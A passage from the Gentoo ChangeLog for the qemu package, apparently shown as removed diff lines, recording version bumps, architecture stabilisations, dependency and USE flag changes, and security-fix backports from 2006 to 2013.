'dtc' depend to require development snapshot. Add 's390-ccw.img' to - list of prebuilts. - - 20 Jun 2013; Mike Frysinger metadata.xml, - qemu-1.4.2.ebuild, qemu-9999.ebuild: - Change USE=brltty to the common USE=accessibility #473868. - - 04 Jun 2013; Agostino Sarubbo qemu-1.4.1.ebuild: - Stable for x86, wrt bug #466092 - - 04 Jun 2013; Agostino Sarubbo qemu-1.4.1.ebuild: - Stable for amd64, wrt bug #466092 - - 31 May 2013; Sergei Trofimovich qemu-9999.ebuild: - Added system target: moxie; user targets: mips64, mips64el, mipsn32, - mipsn32el. - - 31 May 2013; Sergei Trofimovich qemu-9999.ebuild: - Unbreak live ebuild: tried to apply nonexisting BACKPORTS, --enable-opengl was - renamed to --enable-glx. - - 30 May 2013; Doug Goldstein qemu-9999.ebuild: - Updates to the live ebuild - - 30 May 2013; Doug Goldstein qemu-1.4.2.ebuild: - Add a missing PYTHON_REQUIRED_USE for the conversion to python-r1 eclass. - -*qemu-1.4.2 (30 May 2013) - - 30 May 2013; Doug Goldstein +qemu-1.4.2.ebuild: - Version bump. Install more python scripts for debugging purposes with - USE=python. Fix man pages not being installed. bug #435534 - - 23 May 2013; Agostino Sarubbo qemu-1.4.0-r1.ebuild: - Stable for amd64, wrt bug #468920 - - 08 May 2013; Agostino Sarubbo qemu-1.4.0-r1.ebuild: - Reverted on x86 because it is masked - - 07 May 2013; Agostino Sarubbo qemu-1.4.0-r1.ebuild: - accidentally keyworded for amd64 - - 07 May 2013; Agostino Sarubbo qemu-1.4.0-r1.ebuild: - Stable for x86, wrt bug #468920 - - 07 May 2013; Doug Goldstein -qemu-1.1.1-r1.ebuild, - -qemu-1.1.2-r2.ebuild, qemu-1.2.2-r3.ebuild, qemu-1.2.2-r4.ebuild, - -qemu-1.3.1.ebuild, -qemu-1.4.0.ebuild, qemu-1.4.0-r1.ebuild, - qemu-1.4.1.ebuild, qemu-9999.ebuild: - Drop older versions. Fix HOMEPAGE. bug #463364 - -*qemu-1.4.1 (07 May 2013) - - 07 May 2013; Doug Goldstein +qemu-1.4.1.ebuild: - Version bump. - - 28 Mar 2013; Steev Klimaszewski qemu-9999.ebuild: - Upstream has changed the qemu configure script, change requested by Cardoe - via email - - 19 Mar 2013; Doug Goldstein qemu-1.4.0-r1.ebuild: - Always ensure the check-report is generated. fixes bug #462010 - -*qemu-1.4.0-r1 (17 Mar 2013) - - 17 Mar 2013; Doug Goldstein +qemu-1.4.0-r1.ebuild, - metadata.xml: - Further work on developing the qemu 1.4.1 stable bump, contains my entire - queue + qemu-kvm migration fixes shared with Fedora. Ensure any libraries - which maybe installed are installed into /usr/lib64 for 64-bit systems. Add - support for libiscsi. Add support for running qemu tests. Also fix bug - #459246, and bug #459120. - - 12 Mar 2013; Doug Goldstein qemu-1.4.0.ebuild: - Add some information on what versions of dependencies we are using to emerge - --info - - 02 Mar 2013; Doug Goldstein metadata.xml: - Update USE flag description based on confusion from upstream reported bug - - 01 Mar 2013; Tiziano Müller qemu-1.4.0.ebuild: - Don't block spice[smartcard] as libcacard is the real blocker and it doesn't - work as planned. - - 28 Feb 2013; Doug Goldstein qemu-9999.ebuild: - TODO no longer exists in the top level. Items are tracked in the bug tracker - now - - 28 Feb 2013; Tiziano Müller qemu-1.4.0.ebuild: - Block libcacard since qemu is libcacard upstream and bundles/installs it from - now on. Also block spice[smartcard] if smartcard-support in qemu is requested - since that one is pulling in libcacard and to make sure users know what to do. - Renaming the binary is then not required anymore. - - 26 Feb 2013; Doug Goldstein qemu-1.2.2-r4.ebuild, - qemu-1.4.0.ebuild: - Fix more typos - - 26 Feb 2013; Doug Goldstein -qemu-1.3.0.ebuild: - Remove older version - - 26 Feb 2013; Doug Goldstein qemu-1.2.2-r4.ebuild, - qemu-1.4.0.ebuild: - Fix fcaps usage - - 25 Feb 2013; Doug Goldstein qemu-1.4.0.ebuild: - Fix patch to virtfs-proxy-helper - - 25 Feb 2013; Agostino Sarubbo qemu-1.2.2-r3.ebuild: - Stable for x86, wrt bug #459094 - - 25 Feb 2013; Agostino Sarubbo qemu-1.2.2-r3.ebuild: - Stable for amd64, wrt bug #459094 - - 25 Feb 2013; Doug Goldstein qemu-1.4.0.ebuild, - metadata.xml: - Fix up depends. Disable building of tools for the user emulation targets to - remove some necessary depends. Fix automagical depend on GnuTLS when VNC - WebSockets are enabled. - - 25 Feb 2013; Doug Goldstein +files/qemu-kvm-1.4, - qemu-1.4.0.ebuild: - Patches from Cole Robinson for qemu-kvm -> qemu migration fixes. - Start on the stable 1.4 patch series. New qemu-kvm wrapper. - -*qemu-1.2.2-r4 (25 Feb 2013) - - 25 Feb 2013; Doug Goldstein +qemu-1.2.2-r4.ebuild, - qemu-1.4.0.ebuild: - Support file capabilities for helper binaries - - 21 Feb 2013; Doug Goldstein qemu-1.2.2-r3.ebuild, - +files/bridge.conf: - Add example qemu-bridge-helper config script. - - 17 Feb 2013; Mike Frysinger files/qemu-binfmt.initd, - files/qemu-binfmt.initd-r1: - Simplify initial checks. - - 17 Feb 2013; Mike Frysinger files/qemu-binfmt.initd, - files/qemu-binfmt.initd-r1: - Fix bashisms in init.d scripts. - -*qemu-1.4.0 (16 Feb 2013) - - 16 Feb 2013; Doug Goldstein +qemu-1.4.0.ebuild: - Initial 1.4.0 version bump - -*qemu-1.3.1 (16 Feb 2013) - - 16 Feb 2013; Doug Goldstein +qemu-1.3.1.ebuild, - qemu-9999.ebuild: - Add a pending 1.3.1 version bump - - 10 Feb 2013; Doug Goldstein qemu-1.2.2-r3.ebuild: - Fix PYTHON_DEPEND line - - 10 Feb 2013; Doug Goldstein -qemu-1.2.1.ebuild, - -qemu-1.2.2.ebuild: - Remove older versions - -*qemu-1.2.2-r3 (10 Feb 2013) - - 10 Feb 2013; Doug Goldstein +qemu-1.2.2-r3.ebuild, - -qemu-1.2.2-r100.ebuild: - Bump to support two different builds for user targets and - system targets to allow you to build one static and one - dynamic. Additionally bump the patchset to include fixes for - bug #455552 and bug #454364 - - 10 Feb 2013; Doug Goldstein qemu-1.3.0.ebuild: - Add back vgabios which was removed incorrectly qemu-1.3.0.ebuild - - 25 Jan 2013; Agostino Sarubbo qemu-1.2.2-r2.ebuild: - Stable for x86, wrt bug #453284 - - 25 Jan 2013; Agostino Sarubbo qemu-1.2.2-r2.ebuild: - Stable for amd64, wrt bug #453284 - - 21 Jan 2013; Doug Goldstein qemu-9999.ebuild: - Fix build issues identified by Michal Privoznik - -*qemu-1.2.2-r100 (21 Jan 2013) - - 21 Jan 2013; Doug Goldstein +qemu-1.2.2-r100.ebuild: - Add support for USE=static-softmmu and USE=static-user. Break out build rules - between the two so we can better support user needs. - - 19 Jan 2013; Doug Goldstein qemu-1.2.2-r2.ebuild: - Just change the name of the tarball so no one sees anything weird - -*qemu-1.2.2-r2 (19 Jan 2013) - - 19 Jan 2013; Doug Goldstein +qemu-1.2.2-r2.ebuild, - -qemu-1.2.2-r1.ebuild: - Regenerate bad patchset. Identified by Marien Zwart , bug - #452918 - -*qemu-1.2.2-r1 (19 Jan 2013) - - 19 Jan 2013; Doug Goldstein +qemu-1.2.2-r1.ebuild, - +files/qemu-binfmt.initd-r1: - Backport a number of stability and code correctness fixes. Fix qemu-user init - script to point to the correct paths. - - 14 Jan 2013; Doug Goldstein qemu-1.2.2.ebuild, - qemu-1.3.0.ebuild, qemu-9999.ebuild: - Install vmxcap script to detect hardware virtualization support - - 14 Jan 2013; Doug Goldstein qemu-1.2.2.ebuild, - qemu-1.3.0.ebuild, qemu-9999.ebuild: - Only tell x86 and amd64 users about the qemu-kvm symlink since it only - applies to them. - - 14 Jan 2013; Doug Goldstein qemu-1.2.2.ebuild, - qemu-1.3.0.ebuild, qemu-9999.ebuild: - Only install the firmware components if we're building a target that uses - them. Update some USE=static blockers. Update the elog message to print out - in correct cases. - - 13 Jan 2013; Doug Goldstein qemu-1.2.2.ebuild: - Rebase backport patchset to fix a glaringly obvious mistake I made when - backporting the arm boot patch. bug #451598 - -*qemu-1.3.0 (12 Jan 2013) - - 12 Jan 2013; Doug Goldstein +qemu-1.3.0.ebuild: - Add an initial masked version of qemu-1.3.0 which doesn't build yet due to - missing SeaBIOS depends. Upstream hasn't actually released a compatible - version yet. - - 12 Jan 2013; Doug Goldstein qemu-1.2.2.ebuild: - Fix some missing user targets - - 12 Jan 2013; Doug Goldstein qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r2.ebuild, qemu-1.2.1.ebuild, qemu-1.2.2.ebuild: - Fix firmware blobs depends to be locked down per each version, similar to how - upstream ships the prebuilt blobs. bug #441716 - - 12 Jan 2013; Doug Goldstein qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r2.ebuild: - Adjust usbredir depends to avoid any future problems. bug #439972 - - 12 Jan 2013; Doug Goldstein -qemu-1.1.2-r1.ebuild, - -qemu-1.1.2-r3.ebuild, -qemu-1.2.0.ebuild: - Remove older versions - - 12 Jan 2013; Doug Goldstein qemu-1.2.1.ebuild, - qemu-1.2.2.ebuild: - Due to various fixes, we need to explicitly depend on this version. bug - #439972 - - 12 Jan 2013; Doug Goldstein qemu-9999.ebuild: - Fixes from qemu-1.2.2 bump. Set usbredir depend to 0.6 and greater since - that's what qemu 1.3 and newer need. - - 12 Jan 2013; Doug Goldstein +files/qemu-binfmt.initd, - qemu-1.2.2.ebuild: - Install initscript that qemu-user provides for binfmts when QEMU_USER_TARGETS - are set. - - 12 Jan 2013; Doug Goldstein qemu-1.2.2.ebuild: - Remove trailing whitespace. - -*qemu-1.2.2 (12 Jan 2013) - - 12 Jan 2013; Doug Goldstein +qemu-1.2.2.ebuild: - Version bump. Fix libseccomp issues (fun tracking that down). Fix doc - installation, fix from Chris Mayo , bug #438228. Fix mips - link issue due to piix4_pm_init, bug # 447196. Backport madvise() call to for - THP support, bug #446490. Fix ld and objcopy calls, bug #438040. Add verbose - log (which is useless), bug #438036. - - 11 Jan 2013; Doug Goldstein qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r1.ebuild, qemu-1.1.2-r2.ebuild, qemu-1.1.2-r3.ebuild, - qemu-1.2.0.ebuild, qemu-1.2.1.ebuild, qemu-9999.ebuild: - Fix bad ampersand usage. - - 10 Jan 2013; Sergei Trofimovich - +files/qemu-9999-cflags.patch, qemu-9999.ebuild: - Refresh cflags patch by Michal Privoznik and by Tom Wijsman (bug #451178). - - 03 Jan 2013; Sven Vermeulen qemu-1.1.2-r2.ebuild, - qemu-1.1.2-r3.ebuild, qemu-1.2.0.ebuild, qemu-1.2.1.ebuild: - Adding SELinux dependency towards selinux-qemu package - - 13 Dec 2012; Samuli Suominen qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r1.ebuild, qemu-1.1.2-r2.ebuild, qemu-1.1.2-r3.ebuild, - qemu-1.2.0.ebuild, qemu-1.2.1.ebuild, qemu-9999.ebuild: - Use udev_dorules to install udev rules into correct path wrt #447116 by - Alexander Tsoy - - 05 Dec 2012; Doug Goldstein qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r1.ebuild, qemu-1.1.2-r2.ebuild, qemu-1.1.2-r3.ebuild, - qemu-1.2.0.ebuild, qemu-1.2.1.ebuild, qemu-9999.ebuild: - Fix spelling mistake found by Francisco Riera . bug - #441632 - - 05 Dec 2012; Sergei Trofimovich - -files/qemu-9999-fix-mipsen.patch, qemu-9999.ebuild: - Drop mips patch as fix gone upstream. - - 04 Dec 2012; Sergei Trofimovich qemu-9999.ebuild: - Follow upstream bump of minimal spice protocol versions. - - 21 Nov 2012; Doug Goldstein qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r1.ebuild, qemu-1.1.2-r2.ebuild, qemu-1.1.2-r3.ebuild, - qemu-1.2.0.ebuild, qemu-1.2.1.ebuild, qemu-9999.ebuild: - Fix usbredir depends based on bug #439972 - - 21 Nov 2012; Doug Goldstein metadata.xml: - Delete no longer used flags. - -*qemu-1.1.2-r3 (21 Nov 2012) - - 21 Nov 2012; Doug Goldstein +qemu-1.1.2-r3.ebuild: - Bump 1.1.2 with more patches from the 1.1.x stabilization queue. - - 21 Nov 2012; Agostino Sarubbo qemu-1.1.2-r2.ebuild: - Stable for x86, wrt to bug #440092 - -*qemu-1.2.1 (21 Nov 2012) - - 21 Nov 2012; Doug Goldstein +qemu-1.2.1.ebuild: - Version bump to qemu 1.2.1 + qemu-kvm 1.2.0 + extra upstream fixes. Should be - Gentoo's first 1.2.x candidate. - - 21 Nov 2012; Doug Goldstein qemu-9999.ebuild: - For 1.3 we're switching to qemu from qemu-kvm which is now merged fully into - qemu so adjust the 9999 live ebuild to do that. - - 05 Nov 2012; Sergei Trofimovich qemu-9999.ebuild: - Once againt readd or32 target (OpenRISC). Added nore binaries to RWX exempt - list: qemu-{microblazeel,or32,s390x,unicore32}. unicore32 got system target - implementation. - - 05 Nov 2012; Doug Goldstein qemu-1.2.0.ebuild, - qemu-9999.ebuild: - Fix typo noticed by Alphat-PC - - 04 Nov 2012; Doug Goldstein qemu-9999.ebuild: - Fix patch name. - - 03 Nov 2012; qemu-1.1.2-r2.ebuild: - Stable for amd64, wrt bug #440092 - - 30 Oct 2012; Doug Goldstein qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r1.ebuild, qemu-1.1.2-r2.ebuild, qemu-1.2.0.ebuild, - qemu-9999.ebuild: - Ensure no one uses USE=bluetooth with USE=static since it doesn't work. - - 30 Oct 2012; Doug Goldstein qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r1.ebuild, qemu-1.1.2-r2.ebuild: - Fix old blocker that's not necessary now that we have the qemu-kvm move. - - 29 Oct 2012; Doug Goldstein qemu-1.2.0.ebuild, - qemu-9999.ebuild: - Updates from the 1.1.x to ready for the 1.2.x series unmask. - - 29 Oct 2012; Tiziano Müller qemu-9999.ebuild: - Fix collision with vscclient in the live ebuild like in the 1.2.0 ebuild. - - 28 Oct 2012; Tiziano Müller qemu-1.2.0.ebuild: - Fix some build issues (missing patch and wrong S), avoid collision with - libcacard (bug #439990). - - 28 Oct 2012; Zac Medico qemu-1.1.1-r1.ebuild, - qemu-1.1.2-r1.ebuild, qemu-1.1.2-r2.ebuild, qemu-1.2.0.ebuild, - qemu-9999.ebuild: - Fix spelling of CONFIG_CHECK for vhost-net. - -*qemu-1.1.2-r2 (24 Oct 2012) - - 24 Oct 2012; Doug Goldstein +qemu-1.1.2-r2.ebuild: - Further stability fixes either applied by upstream or recommended to be - applied. - - 20 Oct 2012; Doug Goldstein - -files/qemu-0.11.0-mips64-user-fix.patch, - -files/qemu-0.11.1-CVE-2012-0029-backport.patch, - -files/qemu-0.11.1-cfg-pulse.patch, -files/qemu-1.0.1-siginfo.patch, - -files/qemu-kvm-1.0-e1000-bounds-packet-size-against-buffer-size.patch, - -files/qemu-1.0-unmagic-debug.patch, -files/qemu-1.0-unmagic-xfsctl.patch, - -qemu-1.1.2.ebuild, -files/qemu-ifdown, -files/qemu-ifup: - Remove ebuild that doesn't have the Gentoo patchset. Remove old files that - are not used. - - 20 Oct 2012; Doug Goldstein -qemu-0.11.1.ebuild, - -qemu-0.11.1-r1.ebuild: - Remove older version from the tree. - - 20 Oct 2012; Doug Goldstein metadata.xml: - Remove unused USE flag descriptions. - - 20 Oct 2012; Doug Goldstein qemu-1.2.0.ebuild: - Add initial qemu-kvm 1.2.0 that is unkeyworded. It is missing the Gentoo - patchset and we really are waiting for 1.2.1 but its slowly dragging its feet - out the door and once it does that will be keyworded. - -*qemu-1.1.2-r1 (20 Oct 2012) - - 20 Oct 2012; Doug Goldstein +qemu-1.1.2-r1.ebuild: - Restore the Gentoo patchset for qemu-kvm. - - 11 Oct 2012; Justin Lecher metadata.xml: - Add better USE description for jpeg and png - - 11 Oct 2012; Sergei Trofimovich - +files/qemu-9999-fix-mipsen.patch: - Addmissing patch for mips (lost after qemu-kvm -> qemu migration). - - 10 Oct 2012; Mike Frysinger qemu-1.1.2.ebuild, - qemu-9999.ebuild: - Make vnc support optional. We can use qemu just fine w/out it, so add - USE="jpeg png vnc" to control the various pieces. - - 10 Oct 2012; Mike Frysinger metadata.xml, - qemu-1.1.2.ebuild, qemu-9999.ebuild: - Convert to USE=uuid since the -luuid interface is portable beyond linux. - - 10 Oct 2012; Mike Frysinger qemu-1.1.2.ebuild, - qemu-9999.ebuild: - Handle more USE=static/static-libs cases. - - 09 Oct 2012; Doug Goldstein metadata.xml: - Update maintainer - - 09 Oct 2012; Doug Goldstein qemu-9999.ebuild: - Update the live ebuild to qemu-kvm. - - 09 Oct 2012; Doug Goldstein qemu-1.1.1-r1.ebuild: - This was stable but repoman didn't want to let me keep it stable after the - move so remarking stable. - - 09 Oct 2012; Doug Goldstein -qemu-1.1.1.ebuild: - Remove ebuild that was never keyworded - -*qemu-1.1.1-r1 (09 Oct 2012) - - 09 Oct 2012; Doug Goldstein +files/65-kvm.rules, - -qemu-1.0-r2.ebuild, -qemu-1.0-r3.ebuild, -qemu-1.0.1.ebuild, - +qemu-1.1.1-r1.ebuild, qemu-1.1.2.ebuild, +files/qemu-kvm: - Bring over the qemu-kvm ebuilds since we're merging the two packages together - to better follow how other distros ship qemu/qemu-kvm. Eventually we'll just - use qemu instead of qemu-kvm but not yet. - -*qemu-1.2.0 (22 Sep 2012) -*qemu-1.1.2 (22 Sep 2012) - - 22 Sep 2012; Mike Frysinger - +files/qemu-1.2.0-cflags.patch, +qemu-1.1.2.ebuild, +qemu-1.2.0.ebuild: - Version bumps. - - 07 Sep 2012; Sergei Trofimovich qemu-9999.ebuild: - Fixed configure failure (upstream got rid of '--enabke-vnc-thread' option). - Added new or32 target (OpenRISC). - -*qemu-1.1.1 (18 Aug 2012) - - 18 Aug 2012; Mike Frysinger +qemu-1.1.1.ebuild, - qemu-9999.ebuild: - Version bump. - - 18 Aug 2012; Mike Frysinger - +files/qemu-1.0.1-siginfo.patch, qemu-1.0.1.ebuild: - Add fix from upstream for building with newer kernel headers. - - 10 Jun 2012; Sergei Trofimovich qemu-9999.ebuild: - Drop '--disable-darwin-user' from configure params. Upstream does not export - it anymore. - - 03 May 2012; Jeff Horelick qemu-0.11.1.ebuild, - qemu-0.11.1-r1.ebuild, qemu-1.0-r2.ebuild, qemu-1.0-r3.ebuild, - qemu-1.0.1.ebuild, qemu-9999.ebuild: - dev-util/pkgconfig -> virtual/pkgconfig - - 24 Mar 2012; Sergei Trofimovich - +files/qemu-0.11.1-cfg-pulse.patch, qemu-0.11.1-r1.ebuild, qemu-0.11.1.ebuild: - Fixed configure failure against pulseaudio-1.1 (bug #384847 by Ian Abbott, - fixed by Ian Abbott and Nathan Phillip Brink). - - 20 Mar 2012; Doug Goldstein qemu-1.0-r3.ebuild, - qemu-1.0.1.ebuild: - Need to set the active version of python to 2 since qemu doesn't support 3. - bug #408991 - - 18 Mar 2012; Samuli Suominen qemu-0.11.1.ebuild, - qemu-0.11.1-r1.ebuild, qemu-1.0-r2.ebuild, qemu-1.0-r3.ebuild, - qemu-1.0.1.ebuild, qemu-9999.ebuild, metadata.xml: - Remove USE="esd" because media-sound/esound isn't in tree anymore. - - 07 Mar 2012; Sergei Trofimovich - +files/qemu-1.0-unmagic-debug.patch, +files/qemu-1.0-unmagic-xfsctl.patch, - qemu-1.0.1.ebuild: - Added patces from upstream for '--disable-debug-info' and '--enable-xfsctl'. - Fixes configure failure (bug #406851 by Markus Peloquin and others). - -*qemu-1.0.1 (03 Mar 2012) - - 03 Mar 2012; Luca Barbato +qemu-1.0.1.ebuild: - New version - - 01 Mar 2012; Brent Baude qemu-0.11.1.ebuild: - Marking qemu-0.11.1 ppc for bug 356685 - - 28 Feb 2012; Sergei Trofimovich qemu-9999.ebuild: - Switch to upstream's '--disable-debug-info' to avoid OOM bug #355861. - - 25 Feb 2012; Doug Goldstein qemu-1.0-r3.ebuild: - When building with USE=static, zlib needs to be built with USE=static-libs. - bug #405785 - -*qemu-1.0-r3 (21 Feb 2012) - - 21 Feb 2012; Luca Barbato +qemu-1.0-r3.ebuild: - Add qemu-user patches in - - 29 Jan 2012; Sergei Trofimovich qemu-1.0-r2.ebuild, - qemu-9999.ebuild: - Respect user's decision whether to generate debug info when build stuff - (related to bug #355861 by Andrew Savchenko). Drop outdated seding of - Makefiles. - -*qemu-0.11.1-r1 (28 Jan 2012) - - 28 Jan 2012; Sergei Trofimovich - +files/qemu-0.11.1-CVE-2012-0029-backport.patch, +qemu-0.11.1-r1.ebuild: - Backport fix for bug #400595 / CVE-2012-0029 (picked from qemu-kvm ebuild). - - 27 Jan 2012; Sergei Trofimovich metadata.xml, - qemu-9999.ebuild: - Added USE=xfs knob to handle XFS optimizations (uses sys-fs/xfsprogs). - -*qemu-1.0-r2 (26 Jan 2012) - - 26 Jan 2012; Sergei Trofimovich - +files/qemu-kvm-1.0-e1000-bounds-packet-size-against-buffer-size.patch, - +qemu-1.0-r2.ebuild, -qemu-0.14.0.ebuild, -qemu-1.0-r1.ebuild, - qemu-9999.ebuild: - Fix for bug #400595 / CVE-2012-0029 (picked from qemu-kvm ebuild). Restored - manual doc installation (upstream installs only html bits). Added USE=kvm to - live ebuild. Dropped old. - - 23 Jan 2012; Sergei Trofimovich qemu-9999.ebuild: - Whitespace. - -*qemu-1.0-r1 (23 Jan 2012) - - 23 Jan 2012; Sergei Trofimovich +qemu-1.0-r1.ebuild, - -qemu-1.0.ebuild, metadata.xml, qemu-9999.ebuild: - Put back optional USE=opengl flag, added USE=usbredir and prefix support. - Bumped up to EAPI=4 and cleaned doc installation (by WilliamH). - - 23 Jan 2012; William Hubbs qemu-9999.ebuild: - clean up live ebuild and migrate to eapi 4 (approved by slyfox) - - 22 Jan 2012; Sergei Trofimovich qemu-1.0.ebuild: - Hide qemu-ppc* binaries from RWX mappings QA check. - - 22 Jan 2012; Sergei Trofimovich qemu-9999.ebuild: - Hide qemu-ppc* binaries from RWX mappings QA check. - - 22 Jan 2012; Sergei Trofimovich qemu-1.0.ebuild, - qemu-9999.ebuild: - Fix USE=xen to depend on app-emulation/xen-tools. app-emulation/xen does not - provide any libraries. - - 22 Jan 2012; Sergei Trofimovich qemu-9999.ebuild: - Added _all_ emulated audio cards (bug #144894 by Torsten Krah) - -*qemu-1.0 (22 Jan 2012) - - 22 Jan 2012; Sergei Trofimovich +qemu-1.0.ebuild, - qemu-9999.ebuild: - Version bump (requested by Anton Kochkov and others in bug #367153). - - 22 Jan 2012; Sergei Trofimovich metadata.xml, - qemu-9999.ebuild: - Added LatticeMico32 (lm32) softmmu target. Added USE="nss rbd spice threads - +vhost-net xattr xen" to get control of some automagic depends (bug #326491 by - Diego Elio Pettenò); mostly picked from qemu-kvm-9999.ebuild. Updated USE=curl - description (bug #354565 by klondike). - - 22 Jan 2012; Sergei Trofimovich qemu-0.11.1.ebuild, - qemu-0.14.0.ebuild, qemu-9999.ebuild: - Removed blockers on app-emulation/qemu-softmmu (dead 10 months ago) and on - app-emulation/qemu-kvm-spice (dead 6 months ago). - - 21 Jan 2012; Sergei Trofimovich qemu-9999.ebuild: - Fixed configure failure (follow upstream in renaming --enablble-user-pic to - --enable-pic). Added all missing linux targets except lm32 (needs proper deps - and a fix against --as-needed). Made ./configure params to be shown. - - 20 Sep 2011; Michał Górny qemu-9999.ebuild: - Migrate to git-2. - -*qemu-9999 (27 Jun 2011) - - 27 Jun 2011; Luca Barbato +qemu-9999.ebuild: - Introduce live ebuild, useful for static qemu-user deployment - - 24 Mar 2011; Christoph Mende qemu-0.11.1.ebuild: - Stable on amd64 wrt bug #356685 - - 17 Mar 2011; Thomas Kahle qemu-0.11.1.ebuild: - x86 stable per bug 356685 - - 28 Feb 2011; Doug Goldstein -qemu-0.9.1.ebuild: - Remove old version - - 20 Feb 2011; Zac Medico qemu-0.14.0.ebuild: - Bug #355589 - Fix qemu-ifup die logic. - - 20 Feb 2011; Luca Barbato qemu-0.14.0.ebuild: - Fix description - -*qemu-0.14.0 (19 Feb 2011) - - 19 Feb 2011; Luca Barbato +qemu-0.14.0.ebuild, - metadata.xml: - New version, ebuild mostly in line with qemu-kvm - - 15 Oct 2010; Diego E. Pettenò -qemu-0.9.0.ebuild, - qemu-0.9.1.ebuild, -qemu-0.10.0.ebuild, -qemu-0.10.1.ebuild, - -qemu-0.10.3.ebuild, -files/qemu-0.10.3-nopl-fix.patch, - -qemu-0.10.4.ebuild, -qemu-0.10.5.ebuild, -qemu-0.10.6.ebuild, - -qemu-0.11.0.ebuild: - Belated spring cleaning of ebuilds and files; this also re-sync the ppc - keyword with the qemu-softmmu package which this is just an alias of. - - 30 Jun 2010; Harald van Dijk qemu-0.10.3.ebuild, - qemu-0.10.4.ebuild, qemu-0.10.5.ebuild, qemu-0.10.6.ebuild, - qemu-0.11.0.ebuild, qemu-0.11.1.ebuild: - Fix quoting - - 05 Jan 2010; Diego E. Pettenò qemu-0.10.3.ebuild, - qemu-0.10.4.ebuild, qemu-0.10.5.ebuild, qemu-0.10.6.ebuild, - qemu-0.11.0.ebuild, qemu-0.11.1.ebuild: - Fix trivial mistake. Closes bug #280121 by Kerin Millar. - - 15 Dec 2009; Doug Goldstein metadata.xml: - change to qemu herd - -*qemu-0.11.1 (06 Dec 2009) - - 06 Dec 2009; Luca Barbato +qemu-0.11.1.ebuild: - Version bump - - 23 Nov 2009; Luca Barbato qemu-0.11.0.ebuild: - fix bug #286012, thanks to Thomas Kister for the - patch - - 22 Nov 2009; Luca Barbato qemu-0.11.0.ebuild: - use --disable-strip instead of sed - - 17 Nov 2009; Luca Barbato qemu-0.11.0.ebuild: - Fix hardened build, thanks to Xake for the patch and - the notice in bug #287308 - - 05 Nov 2009; Patrick Lauer qemu-0.11.0.ebuild: - Fixing bad --disable-gfx-check, closes #286370 - -*qemu-0.11.0 (23 Oct 2009) - - 23 Oct 2009; Luca Barbato - +files/qemu-0.11.0-mips64-user-fix.patch, +qemu-0.11.0.ebuild: - New release - -*qemu-0.10.6 (05 Sep 2009) - - 05 Sep 2009; Luca Barbato +qemu-0.10.6.ebuild: - Version Bump - -*qemu-0.10.5 (07 Jun 2009) - - 07 Jun 2009; Luca Barbato +qemu-0.10.5.ebuild: - New version - - 19 May 2009; Diego E. Pettenò qemu-0.10.4.ebuild: - Fix doc installation: install html in the html/ subdir, install more qemu - doc, rename the README file (it's not qemu's proper), die on error. - - 19 May 2009; Luca Barbato qemu-0.10.4.ebuild: - fix missing patch, thanks to Martin Jansa for - noticing - -*qemu-0.10.4 (19 May 2009) - - 19 May 2009; Luca Barbato +qemu-0.10.4.ebuild: - New version - - 17 May 2009; Diego E. Pettenò qemu-0.10.3.ebuild, - +files/qemu-ifdown, +files/qemu-ifup: - Add missing ifup/ifdown scripts, change install logic, make sure they are - not added executable to CVS. - -*qemu-0.10.3 (17 May 2009) - - 17 May 2009; Luca Barbato - +files/qemu-0.10.3-nopl-fix.patch, +qemu-0.10.3.ebuild: - New ebuild, thanks to Xake for contributing it in bug - #190298 - -*qemu-0.10.1 (22 Mar 2009) - - 22 Mar 2009; Luca Barbato +qemu-0.10.1.ebuild: - Bugfix release - -*qemu-0.10.0 (09 Mar 2009) - - 09 Mar 2009; Luca Barbato +qemu-0.10.0.ebuild: - New version - - 03 Sep 2008; Thomas Anderson qemu-0.9.1.ebuild: - stable amd64, needed to go stable becuase qemu-softmmu went stable, mfi - - 18 May 2008; Christian Faulhammer qemu-0.9.1.ebuild: - stable x86 - - 01 Feb 2008; Luca Barbato -qemu-0.8.0.ebuild, - -qemu-0.8.0.20060329.ebuild, -qemu-0.8.1.ebuild, -qemu-0.8.2.ebuild: - Remove qemu-0.8 series - - 28 Jan 2008; Luca Barbato qemu-0.9.1.ebuild: - avoid qemu-user, it is broken - -*qemu-0.9.1 (27 Jan 2008) - - 27 Jan 2008; Luca Barbato +qemu-0.9.1.ebuild: - Version bump - - 20 May 2007; Christian Faulhammer qemu-0.9.0.ebuild: - stable amd64, security bug 176674 - - 16 May 2007; Luca Barbato qemu-0.9.0.ebuild: - Marked ppc - - 08 May 2007; Markus Ullmann qemu-0.9.0.ebuild: - Stable on x86 wrt security bug #176674 - -*qemu-0.9.0 (06 Feb 2007) - - 06 Feb 2007; Luca Barbato +qemu-0.9.0.ebuild: - New version - - 06 Feb 2007; Simon Stelling qemu-0.8.2.ebuild: - stable on amd64; bug 159522 - - 02 Jan 2007; Christian Faulhammer qemu-0.8.2.ebuild: - stable x86, bug #159522 - - 31 Dec 2006; Luca Barbato qemu-0.8.2.ebuild: - Marked ppc - -*qemu-0.8.2 (16 Aug 2006) - - 16 Aug 2006; Luca Barbato +qemu-0.8.2.ebuild: - Meta ebuild bumped - - 09 Jun 2006; Michael Sterrett - -files/qemu-0.6.0-configure.patch, -files/qemu-0.6.0-sigaction.patch, - -files/qemu-0.6.0-typo.patch, -files/qemu-0.6.1-20041126.patch, - -files/qemu-0.7.0-errno.patch, -files/kqemu-sysfs.patch, - -qemu-0.6.1.ebuild, -qemu-0.6.1-r1.ebuild, -qemu-0.7.0-r1.ebuild, - -qemu-0.7.1.ebuild, -qemu-0.7.2.ebuild: - clean out old versions - -*qemu-0.8.1 (06 May 2006) - - 06 May 2006; Luca Barbato +qemu-0.8.1.ebuild: - New version - - 19 Apr 2006; Daniel Gryniewicz qemu-0.8.0.ebuild: - Marked stable on amd64 per bug# 123972 - - 16 Apr 2006; Michael Hanselmann qemu-0.8.0.ebuild: - Stable on ppc. - -*qemu-0.8.0.20060329 (29 Mar 2006) - - 29 Mar 2006; Luca Barbato metadata.xml, - +qemu-0.8.0.20060329.ebuild: - New version - - 29 Mar 2006; Chris White qemu-0.8.0.ebuild: - x86 stable for qemu-0.8.0 bug #123972. - - 28 Jan 2006; Luca Barbato -files/qemu_gcc34.patch.gz, - -qemu-0.6.0.ebuild: - cleanup - 